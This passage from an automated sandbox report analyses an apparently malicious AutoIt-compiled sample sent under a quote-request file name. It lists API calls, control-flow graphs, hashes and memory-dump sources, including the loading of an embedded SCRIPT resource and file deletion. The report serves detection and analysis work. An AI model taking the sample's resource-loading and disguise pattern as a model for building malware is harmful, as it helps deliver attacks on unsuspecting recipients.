                                                                                Similarity
                                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                • String ID:
                                                                                • API String ID: 1986165174-0
                                                                                • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                                • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2155 404e89-404ea1 CreateStreamOnHGlobal 2156 404ec1-404ec6 2155->2156 2157 404ea3-404eba FindResourceExW 2155->2157 2158 43d933-43d942 LoadResource 2157->2158 2159 404ec0 2157->2159 2158->2159 2160 43d948-43d956 SizeofResource 2158->2160 2159->2156 2160->2159 2161 43d95c-43d967 LockResource 2160->2161 2161->2159 2162 43d96d-43d98b 2161->2162 2162->2159
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                                • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                                • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: %$%I
                                                                                • API String ID: 3964851224-3058261900
                                                                                • Opcode ID: 00ed509fc03d9b03bfe68998738051d25154e1b4eada985af7c21d037ecb1067
                                                                                • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                                • Opcode Fuzzy Hash: 00ed509fc03d9b03bfe68998738051d25154e1b4eada985af7c21d037ecb1067
                                                                                • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %$DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                • API String ID: 0-424349088
                                                                                • Opcode ID: 9c7de32c11f541e08c1102b3f1b113d928d24f1b490eeab84d8050e4c2ea4161
                                                                                • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                                • Opcode Fuzzy Hash: 9c7de32c11f541e08c1102b3f1b113d928d24f1b490eeab84d8050e4c2ea4161
                                                                                • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                • String ID:
                                                                                • API String ID: 48322524-0
                                                                                • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                                                • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                                                • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                                                APIs
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                • timeGetTime.WINMM ref: 00410D16
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                • DestroyWindow.USER32 ref: 00410F06
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                • TranslateMessage.USER32(?), ref: 00445C60
                                                                                • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                • String ID: %$@COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                • API String ID: 4212290369-2752490676
                                                                                • Opcode ID: 6a04067c4a1f6b73516e56ecc44c7f7504fb8ede6fef070ef3e4439dc9617396
                                                                                • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                                                • Opcode Fuzzy Hash: 6a04067c4a1f6b73516e56ecc44c7f7504fb8ede6fef070ef3e4439dc9617396
                                                                                • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFreeLast
                                                                                • String ID:
                                                                                • API String ID: 1762890227-0
                                                                                • Opcode ID: 967d7c1d16dd6dbd9b9f392e34917eb0cbad5d21a40852bdac76c6764a6edf78
                                                                                • Instruction ID: 5b45c3b217dcc1746ea3d538418c29857c74580bfdf6ec00a9f31328435d333d
                                                                                • Opcode Fuzzy Hash: 967d7c1d16dd6dbd9b9f392e34917eb0cbad5d21a40852bdac76c6764a6edf78
                                                                                • Instruction Fuzzy Hash: E2F1262195C3809FCF365B288C48B353AE4EF77760F5C06FAE455A61F2EE658C089266

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1132 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1145 46920b-469212 call 469734 1132->1145 1146 4692b8-4692bf call 469734 1132->1146 1151 4692c1-4692c3 1145->1151 1152 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1145->1152 1146->1151 1153 4692c8 1146->1153 1154 46952a-46952b 1151->1154 1156 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1152->1156 1153->1156 1157 469548-469558 call 405211 1154->1157 1191 469390-4693ab call 468fa5 1156->1191 1192 469389-46938b 1156->1192 1195 4693b1-4693b9 1191->1195 1196 46943d-469449 call 4253a6 1191->1196 1192->1154 1197 4693c1 1195->1197 1198 4693bb-4693bf 1195->1198 1203 46945f-469463 1196->1203 1204 46944b-46945a DeleteFileW 1196->1204 1200 4693c6-4693e4 call 404f0b 1197->1200 1198->1200 1208 4693e6-4693eb 1200->1208 1209 46940e-469424 call 468953 call 424863 1200->1209 1206 469505-469519 CopyFileW 1203->1206 1207 469469-4694f2 call 4240bb call 4699ea call 468b06 1203->1207 1204->1154 1211 46952d-469543 DeleteFileW call 4698a2 1206->1211 1212 46951b-469528 DeleteFileW 1206->1212 1207->1211 1228 4694f4-469503 DeleteFileW 1207->1228 1214 4693ee-469401 call 4690dd 1208->1214 1225 469429-469434 1209->1225 1211->1157 1212->1154 1223 469403-46940c 1214->1223 1223->1209 1225->1195 1227 46943a 1225->1227 1227->1196 1228->1154
                                                                                APIs
                                                                                  • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                                                  • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                • __wsplitpath.LIBCMT ref: 00469234
                                                                                  • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                                                • _wcscpy.LIBCMT ref: 00469247
                                                                                • _wcscat.LIBCMT ref: 0046925A
                                                                                • __wsplitpath.LIBCMT ref: 0046927F
                                                                                • _wcscat.LIBCMT ref: 00469295
                                                                                • _wcscat.LIBCMT ref: 004692A8
                                                                                  • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                                                  • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                                                • _wcscmp.LIBCMT ref: 004691EF
                                                                                  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                                                • _wcsncpy.LIBCMT ref: 004694C5
                                                                                • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                • String ID:
                                                                                • API String ID: 1500180987-0
                                                                                • Opcode ID: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
                                                                                • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                                                • Opcode Fuzzy Hash: 1fdc1389585ee25c9ba0c3a9ed97a450cce0af2ebfbc5111a641a9f349b24362
                                                                                • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                                                • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                                                • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                • LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                                                • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                                                • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1298 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1315 43e8b1-43e8cc RegQueryValueExW 1298->1315 1316 4071b6-4071d3 call 405904 * 2 1298->1316 1318 43e943-43e94f RegCloseKey 1315->1318 1319 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1315->1319 1318->1316 1322 43e955-43e959 1318->1322 1332 43e92b-43e931 1319->1332 1333 43e90f-43e929 call 407bcc 1319->1333 1323 43e95e-43e984 call 4079f2 * 2 1322->1323 1338 43e986-43e994 call 4079f2 1323->1338 1339 43e9a9-43e9b6 call 422bfc 1323->1339 1336 43e933-43e940 call 420e2c * 2 1332->1336 1337 43e941 1332->1337 1333->1332 1336->1337 1337->1318 1338->1339 1348 43e996-43e9a7 call 422d8d 1338->1348 1350 43e9b8-43e9c9 call 422bfc 1339->1350 1351 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1339->1351 1360 43ea1c-43ea1d 1348->1360 1350->1351 1358 43e9cb-43e9db call 422d8d 1350->1358 1351->1316 1351->1360 1358->1351 1360->1323
                                                                                APIs
                                                                                  • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                                                  • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                                • _wcscat.LIBCMT ref: 0043E9A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                • API String ID: 2673923337-2727554177
                                                                                • Opcode ID: 133e3e37f574de517d09904d6d121d229fd4917e6981f68f0fa09f99abbafb76
                                                                                • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                                • Opcode Fuzzy Hash: 133e3e37f574de517d09904d6d121d229fd4917e6981f68f0fa09f99abbafb76
                                                                                • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1368 403633-403681 1370 4036e1-4036e3 1368->1370 1371 403683-403686 1368->1371 1370->1371 1374 4036e5 1370->1374 1372 4036e7 1371->1372 1373 403688-40368f 1371->1373 1378 4036ed-4036f0 1372->1378 1379 43d0cc-43d0fa call 411070 call 411093 1372->1379 1375 403695-40369a 1373->1375 1376 40374b-403753 PostQuitMessage 1373->1376 1377 4036ca-4036d2 DefWindowProcW 1374->1377 1381 4036a0-4036a2 1375->1381 1382 43d154-43d168 call 462527 1375->1382 1383 403711-403713 1376->1383 1384 4036d8-4036de 1377->1384 1385 4036f2-4036f3 1378->1385 1386 403715-40373c SetTimer RegisterWindowMessageW 1378->1386 1413 43d0ff-43d106 1379->1413 1388 403755-40375f call 4044a0 1381->1388 1389 4036a8-4036ad 1381->1389 1382->1383 1406 43d16e 1382->1406 1383->1384 1392 4036f9-40370c KillTimer call 40443a call 403114 1385->1392 1393 43d06f-43d072 1385->1393 1386->1383 1390 40373e-403749 CreatePopupMenu 1386->1390 1407 403764 1388->1407 1395 4036b3-4036b8 1389->1395 1396 43d139-43d140 1389->1396 1390->1383 1392->1383 1399 43d074-43d076 1393->1399 1400 43d0a8-43d0c7 MoveWindow 1393->1400 1404 43d124-43d134 call 462d36 1395->1404 1405 4036be-4036c4 1395->1405 1396->1377 1402 43d146-43d14f call 457c36 1396->1402 1408 43d097-43d0a3 SetFocus 1399->1408 1409 43d078-43d07b 1399->1409 1400->1383 1402->1377 1404->1383 1405->1377 1405->1413 1406->1377 1407->1383 1408->1383 1409->1405 1414 43d081-43d092 call 411070 1409->1414 1413->1377 1417 43d10c-43d11f call 40443a call 40434a 1413->1417 1414->1383 1417->1377
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                                • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                                • CreatePopupMenu.USER32 ref: 0040373E
                                                                                • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated$%I
